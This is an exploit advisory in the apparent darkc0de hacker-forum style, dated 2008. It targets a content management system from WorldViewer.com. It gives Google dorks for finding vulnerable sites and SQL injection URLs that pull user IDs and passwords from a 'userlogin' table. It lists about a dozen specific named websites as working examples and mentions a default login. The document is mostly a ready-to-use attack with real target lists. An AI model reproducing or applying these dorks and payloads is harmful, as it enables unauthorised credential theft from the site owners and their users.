################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # d3hydr8 - rsauron - baltazar - sinner_01 - r45c4l - beenu # # and all darkc0de members # ################################################################ # # Author: P47r1ck # # Home : www.darkc0de.com # # Email : P47r1ckro[at]gmail[dot]com # # Share the c0de! # ################################################################ # # Designed by wwww.AWebsiteforAll.com. Developed & Promoted by WorldViewer.com Inc. # ################################################################ # # Dork: .php?linkid= "www.WorldViewer.com" # Dork1: inurl:emailSignup.php?linkid= "www.WorldViewer.com" # Dork2: inurl:showContact.php?linkid= "www.WorldViewer.com" # Dork3: inurl:showPageContents.php?linkid= "www.WorldViewer.com" # Dork4: inurl:showChapters.php?linkid= "www.WorldViewer.com" # Dork5: Continue the list by yourself ;) # ################################################################ # # Most of the page's are vulnerable. # # Exemple: emailSignup.php?linkid= # showContact.php?linkid= # showGuestBook.php?linkid= # showPageContents.php?linkid= # showChapters.php?linkid= # etc. # # # Exploit: # # http://www.site.com/php/showChapters.php?linkid=3+and+1=2+union+select+all+concat(userid,0x3a,password)+from+userlogin-- # http://www.site.com/php/showChapters.php?linkid=3+and+1=2+union+select+all+1,concat(userid,0x3a,password),3+from+userlogin-- # http://www.site.com/php/showChapters.php?linkid=3+and+1=2+union+select+all+1,concat(userid,0x3a,password)+from+userlogin-- # # Example: # # http://cslaundry.com/php/emailSignup.php?linkid=6+and+1=2+and+1=2+union+select+all+concat(userid,0x3a,password)+from+userlogin-- # http://www.queenofheartsusa.com/php/showContact.php?linkid=2+and+1=2+and+1=2+union+select+all+concat(userid,0x3a,password)+from+userlogin-- # http://www.aladdinny.com/php/showGuestBook.php?linkid=5+and+1=2+and+1=2+union+select+all+concat(userid,0x3a,password)+from+userlogin-- # http://www.tinacanaris.com/php/showPageContents.php?linkid=3+and+1=2+and+1=2+union+select+all+concat(userid,0x3a,password)+from+userlogin-- # http://www.iafpe.org/php/showChapters.php?linkid=3+and+1=2+and+1=2+union+select+all+concat(userid,0x3a,password)+from+userlogin-- # http://kmroy.com/php/showContent.php?linkid=16+and+1=2+and+1=2+union+select+all+concat(userid,0x3a,password)+from+userlogin-- # http://popejohnpaul.com/php/showContent.php?linkid=4+and+1=2+union+select+all+1,concat(userid,0x3a,password),3+from+userlogin-- # http://www.aladdinny.com/php/showContent.php?linkid=4+and+1=2+union+select+all+1,concat(userid,0x3a,password)+from+userlogin-- # http://www.greenvalecivic.org/php/showContent.php?linkid=11+and+1=2+union+select+all+1,concat(userid,0x3a,password)+from+userlogin-- # # # It seems that there is a default username and password : [ NET:BIOS ] # # ################################################################ # Vuln Discovered 14 Sep 2008